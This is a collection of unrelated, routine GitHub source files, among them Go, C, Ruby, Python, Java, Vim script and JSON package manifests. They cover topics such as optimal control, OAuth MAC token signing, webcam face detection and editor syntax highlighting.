"github.com/animenotifier/notify.moe/components"
)
const maxEntries = 70
// NoDescription shows companies that are still missing a description (most popular first, capped at maxEntries).
func NoDescription(ctx aero.Context) error {
user := arn.GetUserFromContext(ctx)
if user == nil || (user.Role != "admin" && user.Role != "editor") {
return ctx.Redirect(http.StatusTemporaryRedirect, "/")
}
companies := arn.FilterCompanies(func(company *arn.Company) bool {
return !company.IsDraft && len(company.Description) < 5
})
arn.SortCompaniesPopularFirst(companies)
count := len(companies)
if count > maxEntries {
companies = companies[:maxEntries]
}
return ctx.HTML(components.CompaniesEditorList(companies, count, ctx.Path(), user))
}
| {
"pile_set_name": "Github"
} |
/* SPDX-License-Identifier: GPL-2.0 */
#ifndef _ASM_GENERIC_BITOPS_FLS64_H_
#define _ASM_GENERIC_BITOPS_FLS64_H_
#include <asm/types.h>
/**
* fls64 - find last set bit in a 64-bit word
* @x: the word to search
*
* This is defined in a similar way as the libc and compiler builtin
* ffsll, but returns the position of the most significant set bit.
*
* fls64(value) returns 0 if value is 0 or the position of the last
* set bit if value is nonzero. The last (most significant) bit is
* at position 64.
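 *
 * For example (illustrative): fls64(0) == 0, fls64(1) == 1 and
 * fls64(0x8000000000000000ULL) == 64.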
*/
#if BITS_PER_LONG == 32
static __always_inline int fls64(__u64 x)
{
__u32 h = x >> 32;
if (h)
return fls(h) + 32;
return fls(x);
}
#elif BITS_PER_LONG == 64
static __always_inline int fls64(__u64 x)
{
if (x == 0)
return 0;
return __fls(x) + 1;
}
#else
#error BITS_PER_LONG not 32 or 64
#endif
#endif /* _ASM_GENERIC_BITOPS_FLS64_H_ */
| {
"pile_set_name": "Github"
} |
//
// FullScreenExample.h
// FSCalendar
//
// Created by Wenchao Ding on 9/16/15.
// Copyright (c) 2015 Wenchao Ding. All rights reserved.
//
#import <UIKit/UIKit.h>
@interface FullScreenExampleViewController : UIViewController
@end
| {
"pile_set_name": "Github"
} |
{
"name": "Appboy-iOS-SDK",
"version": "3.3.1",
"summary": "This is the Braze iOS SDK for Mobile Marketing Automation",
"homepage": "http://www.braze.com",
"license": {
"type": "Commercial",
"text": "Please refer to https://github.com/Appboy/appboy-ios-sdk/blob/master/LICENSE"
},
"authors": {
"Appboy": "http://www.braze.com"
},
"source": {
"git": "https://github.com/Appboy/appboy-ios-sdk.git",
"tag": "3.3.1"
},
"platforms": {
"ios": "8.0"
},
"requires_arc": true,
"documentation_url": "http://documentation.braze.com/",
"exclude_files": "AppboyKit/**/*.txt",
"preserve_paths": "AppboyKit/**/*.*",
"pod_target_xcconfig": {
"OTHER_LDFLAGS": "-ObjC"
},
"default_subspecs": "UI",
"subspecs": [
{
"name": "Core",
"ios": {
"libraries": "z"
},
"frameworks": [
"SystemConfiguration",
"QuartzCore",
"CoreText",
"WebKit"
],
"source_files": [
"AppboyKit/headers/AppboyKitLibrary/*.h",
"AppboyKit/ABKIdentifierForAdvertisingProvider.m",
"AppboyKit/ABKModalWebViewController.m",
"AppboyKit/ABKNoConnectionLocalization.m"
],
"vendored_libraries": "AppboyKit/libAppboyKitLibrary.a",
"weak_frameworks": [
"CoreTelephony",
"Social",
"Accounts",
"AdSupport",
"StoreKit",
"UserNotifications"
]
},
{
"name": "UI",
"resources": "AppboyKit/Appboy.bundle",
"dependencies": {
"Appboy-iOS-SDK/Feedback": [
],
"Appboy-iOS-SDK/InAppMessage": [
],
"Appboy-iOS-SDK/Core": [
]
}
},
{
"name": "Feedback",
"source_files": [
"AppboyUI/ABKFeedbackViewController/FeedbackViewController/*.*",
"AppboyUI/ABKFeedbackViewController/AppboyFeedback.h",
"AppboyUI/ABKUIUtils/**/*.*"
],
"resources": "AppboyUI/ABKFeedbackViewController/Feedback_Resources/**/*.*",
"dependencies": {
"Appboy-iOS-SDK/Core": [
]
}
},
{
"name": "InAppMessage",
"source_files": [
"AppboyUI/ABKUIUtils/**/*.*",
"AppboyUI/InAppMessage/*.*",
"AppboyUI/InAppMessage/ViewControllers/*.*",
"AppboyKit/ABKSDWebImageProxy.m"
],
"resources": "AppboyUI/InAppMessage/Resources/*.*",
"dependencies": {
"SDWebImage/GIF": [
"~>4.0"
],
"Appboy-iOS-SDK/Core": [
]
}
}
]
}
| {
"pile_set_name": "Github"
} |
#
# This file is part of CasADi.
#
# CasADi -- A symbolic framework for dynamic optimization.
# Copyright (C) 2010-2014 Joel Andersson, Joris Gillis, Moritz Diehl,
# K.U. Leuven. All rights reserved.
# Copyright (C) 2011-2014 Greg Horn
#
# CasADi is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# CasADi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with CasADi; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
#
from casadi import *
"""
This example is mainly intended for CasADi presentations. It contains a compact
implementation of a direct single shooting method for DAEs using a minimal
number of CasADi concepts.
It solves the following optimal control problem (OCP) in differential-algebraic
equations (DAE):
minimize integral_{t=0}^{10} x0^2 + x1^2 + u^2 dt
x0,x1,z,u
subject to dot(x0) == z*x0-x1+u \
dot(x1) == x0 } for 0 <= t <= 10
0 == x1^2 + z - 1 /
x0(t=0) == 0
x1(t=0) == 1
x0(t=10) == 0
x1(t=10) == 0
-0.75 <= u <= 1 for 0 <= t <= 10
Note that other methods such as direct collocation or direct multiple shooting
are usually preferable to the direct single shooting method in practice.
Joel Andersson, 2012-2015
"""
# Declare variables
x = SX.sym("x",2) # Differential states
z = SX.sym("z") # Algebraic variable
u = SX.sym("u") # Control
# Differential equation
f_x = vertcat(z*x[0]-x[1]+u, x[0])
# Algebraic equation
f_z = x[1]**2 + z - 1
# Lagrange cost term (quadrature)
f_q = x[0]**2 + x[1]**2 + u**2
# Create an integrator
dae = {'x':x, 'z':z, 'p':u, 'ode':f_x, 'alg':f_z, 'quad':f_q}
opts = {"tf":0.5} # interval length
I = integrator('I', "idas", dae, opts)
# All controls
U = MX.sym("U", 20)
# Construct graph of integrator calls
X = [0,1]
J = 0
for k in range(20):
Ik = I(x0=X, p=U[k])
X = Ik['xf']
J += Ik['qf'] # Sum up quadratures
# Allocate an NLP solver
nlp = {'x':U, 'f':J, 'g':X}
opts = {"ipopt.linear_solver":"ma27"}
solver = nlpsol("solver", "ipopt", nlp, opts)
# Pass bounds, initial guess and solve NLP
sol = solver(lbx = -0.75, # Lower variable bound
ubx = 1.0, # Upper variable bound
lbg = 0.0, # Lower constraint bound
ubg = 0.0, # Upper constraint bound
x0 = 0.0) # Initial guess
print(sol)
| {
"pile_set_name": "Github"
} |
{
"name": "tinytime",
"version": "0.2.6",
"amdName": "tinytime",
"main": "dist/tinytime.js",
"umd:main": "dist/tinytime.umd.js",
"license": "MIT",
"repository": {
"type": "git",
"url": "https://github.com/aweary/tinytime"
},
"scripts": {
"rollup:cjs": "NODE_ENV=production rollup -c rollup.config.js -m -f cjs -n $npm_package_amdName $npm_package_jsnext_main -o $npm_package_main",
"rollup:umd": "NODE_ENV=production rollup -c rollup.config.js -m -f umd -n $npm_package_amdName $npm_package_jsnext_main -o dist/tinytime.umd.js",
"rollup": "npm run rollup:cjs && npm run rollup:umd",
"minify": "make uglify",
"build": "npm run rollup && npm run minify && gzip-size dist/tinytime.js | pretty-bytes",
"test": "NODE_ENV=test flow && jest",
"prepublish": "npm run build",
"publish": "np",
"version": "conventional-changelog -p angular -i CHANGELOG.md -s -r 0 && git add CHANGELOG.md"
},
"devDependencies": {
"babel-core": "^6.21.0",
"babel-jest": "^18.0.0",
"babel-plugin-syntax-flow": "^6.18.0",
"babel-plugin-transform-flow-strip-types": "^6.21.0",
"babel-preset-es2015": "^6.18.0",
"conventional-changelog-cli": "^1.3.1",
"flow-bin": "^0.38.0",
"gzip-size-cli": "^1.0.0",
"jest": "^18.1.0",
"np": "^2.13.0",
"pretty-bytes-cli": "^2.0.0",
"rollup": "^0.41.4",
"rollup-plugin-babel": "^2.7.1",
"rollup-plugin-flow": "^1.1.1",
"standard-version": "^4.0.0",
"uglify-js": "^2.7.5"
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2008 Google Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.gwt.dev.jjs.impl.gflow.constants;
import com.google.gwt.dev.jjs.impl.gflow.Analysis;
import com.google.gwt.dev.jjs.impl.gflow.CfgAnalysisTestBase;
import com.google.gwt.dev.jjs.impl.gflow.cfg.Cfg;
import com.google.gwt.dev.jjs.impl.gflow.cfg.CfgEdge;
import com.google.gwt.dev.jjs.impl.gflow.cfg.CfgNode;
/**
 * Tests for {@link ConstantsAnalysis} dataflow analysis.
*/
public class ConstantsAnalysisTest extends CfgAnalysisTestBase<ConstantsAssumption> {
@Override
protected void setUp() throws Exception {
super.setUp();
addSnippetClassDecl("static int i;");
addSnippetClassDecl("static int j;");
addSnippetClassDecl("static int k;");
addSnippetClassDecl("static int l;");
addSnippetClassDecl("static int m;");
addSnippetClassDecl("static int foo() { return 0; };");
addSnippetClassDecl("static void bar(Object o) { };");
addSnippetClassDecl("static int baz(Object o) { return 0; };");
}
public void testDeclWithConstInit() throws Exception {
analyze("void", "int i = 1;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(i, 1) -> [* {i = 1}]",
"END");
}
public void testDeclWithConstOps() throws Exception {
analyze("void", "int i = 1 + 1;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(i, 1 + 1) -> [* {i = 2}]",
"END");
}
public void testDeclWithNonconstInit() throws Exception {
analyze("void", "int i = foo();").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"OPTTHROW(foo()) -> [NOTHROW=* T, RE=1 T, E=1 T]",
"CALL(foo) -> [* T]",
"WRITE(i, EntryPoint.foo()) -> [* T]",
"1: END");
}
public void testReassign() throws Exception {
analyze("void", "int i = 1; i = 2;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(i, 1) -> [* {i = 1}]",
"STMT -> [* {i = 1}]",
"WRITE(i, 2) -> [* {i = 2}]",
"END");
analyze("void", "int i; i = 3;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"STMT -> [* T]",
"WRITE(i, 3) -> [* {i = 3}]",
"END");
}
public void test2Vars() throws Exception {
analyze("void", "int i = 1; int j = 2;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(i, 1) -> [* {i = 1}]",
"STMT -> [* {i = 1}]",
"WRITE(j, 2) -> [* {i = 1, j = 2}]",
"END");
}
public void testSequence() throws Exception {
analyze("void", "int i = 1; int j = i; int k = j; int l = k;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(i, 1) -> [* {i = 1}]",
"STMT -> [* {i = 1}]",
"READ(i) -> [* {i = 1}]",
"WRITE(j, i) -> [* {i = 1, j = 1}]",
"STMT -> [* {i = 1, j = 1}]",
"READ(j) -> [* {i = 1, j = 1}]",
"WRITE(k, j) -> [* {i = 1, j = 1, k = 1}]",
"STMT -> [* {i = 1, j = 1, k = 1}]",
"READ(k) -> [* {i = 1, j = 1, k = 1}]",
"WRITE(l, k) -> [* {i = 1, j = 1, k = 1, l = 1}]",
"END");
}
public void testIfStatement() throws Exception {
analyze("void", "int i = k; if (i == 1) { int j = i; } else { int j = i; } ").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"READ(k) -> [* T]",
"WRITE(i, EntryPoint.k) -> [* T]",
"STMT -> [* T]",
"READ(i) -> [* T]",
"COND (i == 1) -> [THEN=* {i = 1}, ELSE=1 T]",
"BLOCK -> [* {i = 1}]",
"STMT -> [* {i = 1}]",
"READ(i) -> [* {i = 1}]",
"WRITE(j, i) -> [2 {i = 1, j = 1}]",
"1: BLOCK -> [* T]",
"STMT -> [* T]",
"READ(i) -> [* T]",
"WRITE(j, i) -> [* T]",
"2: END");
analyze("int", "int j = 0; if (foo() == 1) j = 1; return j;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(j, 0) -> [* {j = 0}]",
"STMT -> [* {j = 0}]",
"OPTTHROW(foo()) -> [NOTHROW=* {j = 0}, RE=2 {j = 0}, E=2 {j = 0}]",
"CALL(foo) -> [* {j = 0}]",
"COND (EntryPoint.foo() == 1) -> [THEN=* {j = 0}, ELSE=1 {j = 0}]",
"STMT -> [* {j = 0}]",
"WRITE(j, 1) -> [* {j = 1}]",
"1: STMT -> [* T]",
"READ(j) -> [* T]",
"GOTO -> [* T]",
"2: END");
analyze("int", "int j = 0; if (foo() == 1) j = foo(); return j;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(j, 0) -> [* {j = 0}]",
"STMT -> [* {j = 0}]",
"OPTTHROW(foo()) -> [NOTHROW=* {j = 0}, RE=2 {j = 0}, E=2 {j = 0}]",
"CALL(foo) -> [* {j = 0}]",
"COND (EntryPoint.foo() == 1) -> [THEN=* {j = 0}, ELSE=1 {j = 0}]",
"STMT -> [* {j = 0}]",
"OPTTHROW(foo()) -> [NOTHROW=* {j = 0}, RE=2 {j = 0}, E=2 {j = 0}]",
"CALL(foo) -> [* {j = 0}]",
"WRITE(j, EntryPoint.foo()) -> [* T]",
"1: STMT -> [* T]",
"READ(j) -> [* T]",
"GOTO -> [* T]",
"2: END");
}
public void testWhileLoop1() throws Exception {
analyze("void", "int j = 1; while (j > 0) ++j;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(j, 1) -> [* {j = 1}]",
"STMT -> [* {j = 1}]",
"1: READ(j) -> [* T]",
"COND (j > 0) -> [THEN=* T, ELSE=2 T]",
"STMT -> [* T]",
"READWRITE(j, null) -> [1 T]",
"2: END");
}
public void testWhileLoop2() throws Exception {
analyze("void", "int j = 0; while (j > 0) {};").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(j, 0) -> [* {j = 0}]",
"STMT -> [* {j = 0}]",
"1: READ(j) -> [* {j = 0}]",
"COND (j > 0) -> [THEN=* {j = 0}, ELSE=2 {j = 0}]",
"BLOCK -> [1 {j = 0}]",
"2: END");
}
public void testConditionalExpressions() throws Exception {
analyze("void", "boolean b1 = false; boolean b2 = false; if (b1 && (b2 = true)) b1 = true;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(b1, false) -> [* {b1 = false}]",
"STMT -> [* {b1 = false}]",
"WRITE(b2, false) -> [* {b1 = false, b2 = false}]",
"STMT -> [* {b1 = false, b2 = false}]",
"READ(b1) -> [* {b1 = false, b2 = false}]",
"COND (b1) -> [THEN=* {b1 = false, b2 = false}, ELSE=1 {b1 = false, b2 = false}]",
"WRITE(b2, true) -> [* {b1 = false, b2 = true}]",
"1: COND (b1 && (b2 = true)) -> [THEN=* {b1 = false}, ELSE=2 {b1 = false}]",
"STMT -> [* {b1 = false}]",
"WRITE(b1, true) -> [* {b1 = true}]",
"2: END");
}
// Various real-world stuff
public void testVariousStuff() throws Exception {
addSnippetClassDecl("static Object f = null;");
analyze("void",
"Object e = null;" +
"if (f != null) if (e == null)" +
" return;" +
"boolean b = e == null;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(e, null) -> [* {e = null}]",
"STMT -> [* {e = null}]",
"READ(f) -> [* {e = null}]",
"COND (EntryPoint.f != null) -> [THEN=* {e = null}, ELSE=1 {e = null}]",
"STMT -> [* {e = null}]",
"READ(e) -> [* {e = null}]",
"COND (e == null) -> [THEN=* {e = null}, ELSE=1 {e = null}]",
"STMT -> [* {e = null}]",
"GOTO -> [2 {e = null}]",
"1: STMT -> [* {e = null}]",
"READ(e) -> [* {e = null}]",
"WRITE(b, e == null) -> [* {b = true, e = null}]",
"2: END"
);
}
/**
* Parameters should have an initial assumption of non-constant.
*/
public void testParamNonConstant() throws Exception {
analyzeWithParams("void", "int i, int j", "if (j == 0) { i = 0; } j=i; j=0;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"READ(j) -> [* T]",
"COND (j == 0) -> [THEN=* {j = 0}, ELSE=1 T]",
"BLOCK -> [* {j = 0}]",
"STMT -> [* {j = 0}]",
"WRITE(i, 0) -> [* {i = 0, j = 0}]",
"1: STMT -> [* T]",
"READ(i) -> [* T]",
"WRITE(j, i) -> [* T]",
"STMT -> [* T]",
"WRITE(j, 0) -> [* {j = 0}]",
"END"
);
}
@Override
protected Analysis<CfgNode<?>, CfgEdge, Cfg, ConstantsAssumption> createAnalysis() {
return new ConstantsAnalysis();
}
}
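The bracketed expectations in these tests encode a small constants lattice: an entry like {i = 1} on an edge means the analysis has proven i constant there, while T (top) means "not a known constant". The part the if/while tests exercise is the join at control-flow merges. A toy Python sketch of that join rule, with made-up helper names rather than the actual GWT ConstantsAnalysis code:

def join(a, b):
    # Join two assumption maps at a control-flow merge point: a variable
    # stays a known constant only if both incoming edges agree on its value;
    # anything else falls to T ("not a constant"), i.e. is simply dropped.
    return {var: a[var] for var in a.keys() & b.keys() if a[var] == b[var]}

# Merging the THEN branch {j: 1} with the fall-through {j: 0} drops j,
# which is why testIfStatement expects "1: STMT -> [* T]" after the branch.
print(join({"j": 1}, {"j": 0}))          # {}
print(join({"i": 1, "j": 2}, {"i": 1}))  # {'i': 1}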
| {
"pile_set_name": "Github"
} |
" Vim syntax file
" Language: git commit file
" Maintainer: Tim Pope <[email protected]>
" Filenames: *.git/COMMIT_EDITMSG
" Last Change: 2013 May 30
if exists("b:current_syntax")
finish
endif
syn case match
syn sync minlines=50
if has("spell")
syn spell toplevel
endif
syn include @gitcommitDiff syntax/diff.vim
syn region gitcommitDiff start=/\%(^diff --\%(git\|cc\|combined\) \)\@=/ end=/^\%(diff --\|$\|#\)\@=/ fold contains=@gitcommitDiff
syn match gitcommitFirstLine "\%^[^#].*" nextgroup=gitcommitBlank skipnl
syn match gitcommitSummary "^.\{0,50\}" contained containedin=gitcommitFirstLine nextgroup=gitcommitOverflow contains=@Spell
syn match gitcommitOverflow ".*" contained contains=@Spell
syn match gitcommitBlank "^[^#].*" contained contains=@Spell
syn match gitcommitComment "^#.*"
syn match gitcommitHead "^\%(# .*\n\)\+#$" contained transparent
syn match gitcommitOnBranch "\%(^# \)\@<=On branch" contained containedin=gitcommitComment nextgroup=gitcommitBranch skipwhite
syn match gitcommitOnBranch "\%(^# \)\@<=Your branch .\{-\} '" contained containedin=gitcommitComment nextgroup=gitcommitBranch skipwhite
syn match gitcommitBranch "[^ ']\+" contained
syn match gitcommitNoBranch "\%(^# \)\@<=Not currently on any branch." contained containedin=gitcommitComment
syn match gitcommitHeader "\%(^# \)\@<=.*:$" contained containedin=gitcommitComment
syn region gitcommitAuthor matchgroup=gitcommitHeader start=/\%(^# \)\@<=\%(Author\|Committer\):/ end=/$/ keepend oneline contained containedin=gitcommitComment transparent
syn match gitcommitNoChanges "\%(^# \)\@<=No changes$" contained containedin=gitcommitComment
syn region gitcommitUntracked start=/^# Untracked files:/ end=/^#$\|^#\@!/ contains=gitcommitHeader,gitcommitHead,gitcommitUntrackedFile fold
syn match gitcommitUntrackedFile "\t\@<=.*" contained
syn region gitcommitDiscarded start=/^# Change\%(s not staged for commit\|d but not updated\):/ end=/^#$\|^#\@!/ contains=gitcommitHeader,gitcommitHead,gitcommitDiscardedType fold
syn region gitcommitSelected start=/^# Changes to be committed:/ end=/^#$\|^#\@!/ contains=gitcommitHeader,gitcommitHead,gitcommitSelectedType fold
syn region gitcommitUnmerged start=/^# Unmerged paths:/ end=/^#$\|^#\@!/ contains=gitcommitHeader,gitcommitHead,gitcommitUnmergedType fold
syn match gitcommitDiscardedType "\t\@<=[a-z][a-z ]*[a-z]: "he=e-2 contained containedin=gitcommitComment nextgroup=gitcommitDiscardedFile skipwhite
syn match gitcommitSelectedType "\t\@<=[a-z][a-z ]*[a-z]: "he=e-2 contained containedin=gitcommitComment nextgroup=gitcommitSelectedFile skipwhite
syn match gitcommitUnmergedType "\t\@<=[a-z][a-z ]*[a-z]: "he=e-2 contained containedin=gitcommitComment nextgroup=gitcommitUnmergedFile skipwhite
syn match gitcommitDiscardedFile ".\{-\}\%($\| -> \)\@=" contained nextgroup=gitcommitDiscardedArrow
syn match gitcommitSelectedFile ".\{-\}\%($\| -> \)\@=" contained nextgroup=gitcommitSelectedArrow
syn match gitcommitUnmergedFile ".\{-\}\%($\| -> \)\@=" contained nextgroup=gitcommitSelectedArrow
syn match gitcommitDiscardedArrow " -> " contained nextgroup=gitcommitDiscardedFile
syn match gitcommitSelectedArrow " -> " contained nextgroup=gitcommitSelectedFile
syn match gitcommitUnmergedArrow " -> " contained nextgroup=gitcommitSelectedFile
syn match gitcommitWarning "\%^[^#].*: needs merge$" nextgroup=gitcommitWarning skipnl
syn match gitcommitWarning "^[^#].*: needs merge$" nextgroup=gitcommitWarning skipnl contained
syn match gitcommitWarning "^\%(no changes added to commit\|nothing \%(added \)\=to commit\)\>.*\%$"
hi def link gitcommitSummary Keyword
hi def link gitcommitComment Comment
hi def link gitcommitUntracked gitcommitComment
hi def link gitcommitDiscarded gitcommitComment
hi def link gitcommitSelected gitcommitComment
hi def link gitcommitUnmerged gitcommitComment
hi def link gitcommitOnBranch Comment
hi def link gitcommitBranch Special
hi def link gitcommitNoBranch gitcommitBranch
hi def link gitcommitDiscardedType gitcommitType
hi def link gitcommitSelectedType gitcommitType
hi def link gitcommitUnmergedType gitcommitType
hi def link gitcommitType Type
hi def link gitcommitNoChanges gitcommitHeader
hi def link gitcommitHeader PreProc
hi def link gitcommitUntrackedFile gitcommitFile
hi def link gitcommitDiscardedFile gitcommitFile
hi def link gitcommitSelectedFile gitcommitFile
hi def link gitcommitUnmergedFile gitcommitFile
hi def link gitcommitFile Constant
hi def link gitcommitDiscardedArrow gitcommitArrow
hi def link gitcommitSelectedArrow gitcommitArrow
hi def link gitcommitUnmergedArrow gitcommitArrow
hi def link gitcommitArrow gitcommitComment
"hi def link gitcommitOverflow Error
hi def link gitcommitBlank Error
let b:current_syntax = "gitcommit"
| {
"pile_set_name": "Github"
} |
module Rack
module OAuth2
class AccessToken
class MAC < AccessToken
attr_required :mac_key, :mac_algorithm
attr_optional :ts, :ext_verifier, :ts_expires_in
attr_reader :nonce, :signature, :ext
def initialize(attributes = {})
super(attributes)
@issued_at = Time.now.utc
@ts_expires_in ||= 5.minutes
end
def token_response
super.merge(
mac_key: mac_key,
mac_algorithm: mac_algorithm
)
end
def verify!(request)
if self.ext_verifier.present?
body = request.body.read
        request.body.rewind # rewind so the body can be re-read downstream
self.ext_verifier.new(
raw_body: body,
algorithm: self.mac_algorithm
).verify!(request.ext)
end
now = Time.now.utc.to_i
now = @ts.to_i if @ts.present?
raise Rack::OAuth2::AccessToken::MAC::Verifier::VerificationFailed.new("Request ts expired") if now - request.ts.to_i > @ts_expires_in.to_i
Signature.new(
secret: self.mac_key,
algorithm: self.mac_algorithm,
nonce: request.nonce,
method: request.request_method,
request_uri: request.fullpath,
host: request.host,
port: request.port,
ts: request.ts,
ext: request.ext
).verify!(request.signature)
rescue Verifier::VerificationFailed => e
request.invalid_token! e.message
end
def authenticate(request)
@nonce = generate_nonce
@ts_generated = @ts || Time.now.utc
if self.ext_verifier.present?
@ext = self.ext_verifier.new(
raw_body: request.body,
algorithm: self.mac_algorithm
).calculate
end
@signature = Signature.new(
secret: self.mac_key,
algorithm: self.mac_algorithm,
nonce: self.nonce,
method: request.header.request_method,
request_uri: request.header.create_query_uri,
host: request.header.request_uri.host,
port: request.header.request_uri.port,
ts: @ts_generated,
ext: @ext
).calculate
request.header['Authorization'] = authorization_header
end
private
def authorization_header
header = "MAC id=\"#{access_token}\""
header << ", nonce=\"#{nonce}\""
header << ", ts=\"#{@ts_generated.to_i}\""
header << ", mac=\"#{signature}\""
header << ", ext=\"#{ext}\"" if @ext.present?
header
end
def generate_nonce
[
(Time.now.utc - @issued_at).to_i,
SecureRandom.hex
].join(':')
end
end
end
end
end
require 'rack/oauth2/access_token/mac/verifier'
require 'rack/oauth2/access_token/mac/sha256_hex_verifier'
require 'rack/oauth2/access_token/mac/signature'
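For context on the class above: a MAC access token proves possession of mac_key by sending an HMAC over a newline-separated "normalized request string" alongside the token. A rough, self-contained Python sketch of that idea; the field order follows the OAuth 2.0 MAC draft and is an assumption here, while the authoritative layout lives in the Signature class required above:

import base64
import hashlib
import hmac

def mac_signature(secret, ts, nonce, method, request_uri, host, port, ext=""):
    # Normalized request string: one field per line, trailing newline included.
    base = "\n".join([str(ts), nonce, method.upper(), request_uri,
                      host.lower(), str(port), ext]) + "\n"
    digest = hmac.new(secret.encode(), base.encode(), hashlib.sha256).digest()
    return base64.b64encode(digest).decode()

print(mac_signature("secret-mac-key", 1336363200, "dj83hs9s:273156",
                    "get", "/resource/1?b=1&a=2", "example.com", 80))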
| {
"pile_set_name": "Github"
} |
from datetime import datetime as dt
import cv2
from bokeh.io import curdoc
from bokeh.models import ColumnDataSource
from bokeh.plotting import figure
from bokeh.sampledata.haar_cascade import frontalface_default_path
CAMERA_WIDTH, CAMERA_HEIGHT = (1280, 780)
# try an external camera device first, fall back to default camera
video_capture = cv2.VideoCapture(1)
if not video_capture.isOpened():
video_capture = cv2.VideoCapture(0)
video_capture.set(cv2.CAP_PROP_FRAME_WIDTH, CAMERA_WIDTH)
video_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, CAMERA_HEIGHT)
# load the pre-trained frontal-face cascade classifier
face_cascade = cv2.CascadeClassifier(frontalface_default_path)
img_plot = figure(plot_width=CAMERA_WIDTH//2, plot_height=CAMERA_HEIGHT//2,
x_range=(0, CAMERA_WIDTH), y_range=(0, CAMERA_HEIGHT),
x_axis_type=None, y_axis_type=None,
tools="", toolbar_location=None, name="image")
image_source = ColumnDataSource(dict(image=[]))
img_plot.image_rgba('image', x=0, y=0, dw=CAMERA_WIDTH, dh=CAMERA_HEIGHT,
source=image_source)
rect_source = ColumnDataSource(dict(x=[], y=[], w=[], h=[]))
img_plot.rect('x', 'y', width='w', height='h', source=rect_source,
fill_color=None, line_color="#fffdd0", line_width=4)
ts_plot = figure(plot_width=CAMERA_WIDTH//2, plot_height=150,
tools="", toolbar_location=None, name="ts")
ts_plot.y_range.start = 0
ts_plot.y_range.min_interval = 2
step_source = ColumnDataSource(dict(t=[], n=[]))
ts_plot.step('t', 'n', source=step_source, line_color="#fffdd0")
t0 = dt.now()
empty_rects = dict(x=[], y=[], w=[], h=[])
def update():
ret, frame = video_capture.read()
if not ret: return
faces_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(faces_frame,
scaleFactor=1.1,
minNeighbors=5,
minSize=(30, 30))
img_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
img_frame = img_frame.view(dtype="uint32").reshape(frame.shape[:2])
    img_frame = img_frame[::-2, ::2] # decimate by 2 and flip vertically for Bokeh's bottom-left origin
if len(faces) == 0:
rect_source.data = empty_rects
else:
        # OpenCV face rects use a top-left origin; convert to box centers in Bokeh's bottom-up frame
faces = [(x+w/2, CAMERA_HEIGHT-y-h/2, w, h) for x, y, w, h in faces]
rect_source.data = dict(zip(('x', 'y', 'w', 'h'), zip(*faces)))
image_source.data["image"] = [img_frame]
step_source.stream({
't': [(dt.now() - t0).total_seconds() * 1000],
'n': [len(faces)]
}, rollover=200)
curdoc().add_root(img_plot)
curdoc().add_root(ts_plot)
curdoc().add_periodic_callback(update, 100)
curdoc().title = "Face Detection"
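The rect conversion in update() is the subtle part: OpenCV reports (x, y, w, h) with a top-left origin, while Bokeh's rect glyph wants the box center in a bottom-up coordinate frame. A standalone check of that mapping (plain Python, no camera required):

CAMERA_HEIGHT = 780

def to_bokeh_rect(x, y, w, h, frame_height=CAMERA_HEIGHT):
    # OpenCV: (x, y) is the top-left corner and y grows downward.
    # Bokeh rect: (x, y) is the box center and y grows upward.
    return (x + w / 2, frame_height - y - h / 2, w, h)

# A 100x100 face at the very top-left of the frame maps to a box centered
# at (50, 730), i.e. near the top-left of the plot.
print(to_bokeh_rect(0, 0, 100, 100))   # (50.0, 730.0, 100, 100)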
| {
"pile_set_name": "Github"
} |
{
"signature": "A personal identifier to accompany your transaction",
"tx-speed-pt-1": "This field regulates speed of transaction, which is always paid in {0}.",
"tx-speed-pt-2": "We recommend having at least .01 {0} before making transactions.",
"print": "Print",
"addr-switch": "Switch Address",
"addr-qr": "Address in QR code",
"addr-display": "Display Address on your device",
"password": "This password encrypts your private key. This does not act as a seed to generate your keys.",
"nonce": "This refers to the number of the transaction you are making. If you have never made a transaction before, this will be 0. Add +1 for each transaction you make. Reference an ETH blockchain explorer if you do not know your current nonce.",
"gas-limit": "This refers to the maximum allowance of gas you will give for a transaction. All excess gas will be refunded from successful transactions. This field should autogenerate based on network congestion."
}
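To make the nonce string above concrete: the nonce of the next transaction is simply how many transactions the address has already sent, starting from 0. A tiny illustrative sketch in Python (hypothetical history, not a wallet API):

sent = ["0xaaa...", "0xbbb...", "0xccc..."]  # transactions already sent from this address
next_nonce = len(sent)                       # the very first transaction would use nonce 0
print(next_nonce)                            # 3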
| {
"pile_set_name": "Github"
} |
/*******************************************************************************
* Copyright (c) 2006, 2008 IBM Corporation and others.
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
